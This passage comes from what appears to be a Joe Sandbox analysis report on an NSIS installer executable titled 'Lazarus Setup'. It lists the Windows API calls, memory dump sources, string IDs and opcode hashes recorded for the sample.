                                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 0583b6918c16dec0e269df833e9dc84b1bd36602652c7031110f346e7b3842d0
                                                                                              • Instruction ID: 92ae7547fb934e5b20a31b6555936ed9a04085bedc3b988c85494c1bea2cd4ea
                                                                                              • Opcode Fuzzy Hash: 0583b6918c16dec0e269df833e9dc84b1bd36602652c7031110f346e7b3842d0
                                                                                              • Instruction Fuzzy Hash: CCF0E7B2A04114AFEB01ABE4DE88DAFB7BDFB54305B10446AF602F6191C7789D018B79
                                                                                              APIs
                                                                                              • SetWindowTextA.USER32(00000000,Lazarus Setup), ref: 004039E9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: TextWindow
                                                                                              • String ID: "C:\Users\user\Desktop\3Pd480eWHA.exe"$1033$Lazarus Setup
                                                                                              • API String ID: 530164218-1246658199
                                                                                              • Opcode ID: 85ceab019c87a04c69db0eea1a6fbc710d8651cdce0cfd73114f661218e3a08a
                                                                                              • Instruction ID: a7121fc51e20562cbfa027eee4ba04e2135699cbca2cdd3690fce58e300c9c30
                                                                                              • Opcode Fuzzy Hash: 85ceab019c87a04c69db0eea1a6fbc710d8651cdce0cfd73114f661218e3a08a
                                                                                              • Instruction Fuzzy Hash: 8311D1B5B056108BE720DF15DC80A73776CEBC6755B28813FE841A73E1D73D9D028A98
                                                                                              APIs
                                                                                                • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Lazarus Setup,NSIS Error), ref: 00405D19
                                                                                                • Part of subcall function 00405817: CharNextA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,?,00405883,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055CE,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405825
                                                                                                • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                                                • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                                              • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055CE,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004058BF
                                                                                              • GetFileAttributesA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055CE,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 004058CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp
                                                                                              • API String ID: 3248276644-3123191268
                                                                                              • Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                                              • Instruction ID: 819bf3b96d2f33be72422b420245a44e5a303c51be7f34a106cb995fc7f4ae7e
                                                                                              • Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                                              • Instruction Fuzzy Hash: B7F0CD27115D5119E61632361C05ABF1A58CE82364718C53FFC51F22D1EA3C8862DD7E
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004030D9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032DC), ref: 00405784
                                                                                              • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004030D9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032DC), ref: 0040578D
                                                                                              • lstrcatA.KERNEL32(?,00409014), ref: 0040579E
                                                                                              Strings
                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040577E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-2382934351
                                                                                              • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                              • Instruction ID: 68e0f27090206f37803ec84d28e37c7f09ebc5753c251fe5cd2e9e8878fbe2c1
                                                                                              • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                              • Instruction Fuzzy Hash: 44D0A972606A307AE2022A15AC09E8F2A08CF62301B044433F200B22A2C63C4E418BFE
                                                                                              APIs
                                                                                              • CharNextA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,?,00405883,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055CE,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405825
                                                                                              • CharNextA.USER32(00000000), ref: 0040582A
                                                                                              • CharNextA.USER32(00000000), ref: 0040583E
                                                                                              Strings
                                                                                              • C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp, xrefs: 00405818
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\nsn1341.tmp
                                                                                              • API String ID: 3213498283-2031227991
                                                                                              • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                              • Instruction ID: db1d673f1cc138dbc44dca3842ff1338afb0bbfba97f9f865265ae6769849a0e
                                                                                              • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                              • Instruction Fuzzy Hash: 8AF06253908F916AFB3272350C84B6B5B89CB55351F1C847BEE41AA2D2827C58608F9A
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                                              • GetTickCount.KERNEL32 ref: 00402C33
                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                                              • Instruction ID: 945901cf9e20f70a46e78403882e62b60873afe576e8e7cbc1612cb0b63c5969
                                                                                              • Opcode Fuzzy Hash: fd7178c7721e2cb8ae00692e9a41079980ecee2ccae2d9a286676897a8e6dfc8
                                                                                              • Instruction Fuzzy Hash: 14F03A30809631ABD622AB34BF8EDDE7A64AB41B01B1184B7F014B21E4D77C58C6CBDD
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00404EC8
                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00404F19
                                                                                                • Part of subcall function 00403F3D: SendMessageA.USER32(00010418,00000000,00000000,00000000), ref: 00403F4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                                              • Instruction ID: 1c3aa9a2031039442b6cd3bdc360fce63fd7b644e996c38402bdeea248e73ffc
                                                                                              • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                                              • Instruction Fuzzy Hash: 2D0171B1104249AFDF219F51DC80A5B3A25E7C4755F104037FB00762D1D33AAD619B6E
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,771B3410,00000000,C:\Users\user~1\AppData\Local\Temp\,004035CF,004033E9,?), ref: 00403611
                                                                                              • GlobalFree.KERNEL32(00981568), ref: 00403618
                                                                                              Strings
                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004035F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$GlobalLibrary
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                              • API String ID: 1100898210-2382934351
                                                                                              • Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                                              • Instruction ID: f0c2977cb20e6558c2e773556eb83bc0584892ec035bd6653f77e23ad75a478d
                                                                                              • Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                                              • Instruction Fuzzy Hash: 1DE0C233905120ABC6315F44FE0472A7B7CAF48B22F020067EC447B3A087786C528BCC
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3Pd480eWHA.exe,C:\Users\user\Desktop\3Pd480eWHA.exe,80000000,00000003), ref: 004057CB
                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3Pd480eWHA.exe,C:\Users\user\Desktop\3Pd480eWHA.exe,80000000,00000003), ref: 004057D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-3976562730
                                                                                              • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                              • Instruction ID: d39d8f188df628cf061828239c0557f0f3bbaa41193ad9941d070ee56f497fe5
                                                                                              • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                              • Instruction Fuzzy Hash: E5D0A772408D706EF30352109C04B8F6A48CF26300F090463F040A3191C27C5D424BBE
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                              • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                              • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1834191377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1834168923.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834213458.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1834234460.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_3Pd480eWHA.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc
                                                                                              • String ID:
                                                                                              • API String ID: 1780285237-0
                                                                                              • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                              • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                              • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                              • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058F4
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040590C
                                                                                              • CharNextA.USER32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040591D
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405B41,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405926
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1827215076.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1827187942.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827248232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827261694.00000000007BC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1827528224.00000000007BE000.00000002.00000001.01000000.00000003.sdmpDownload File
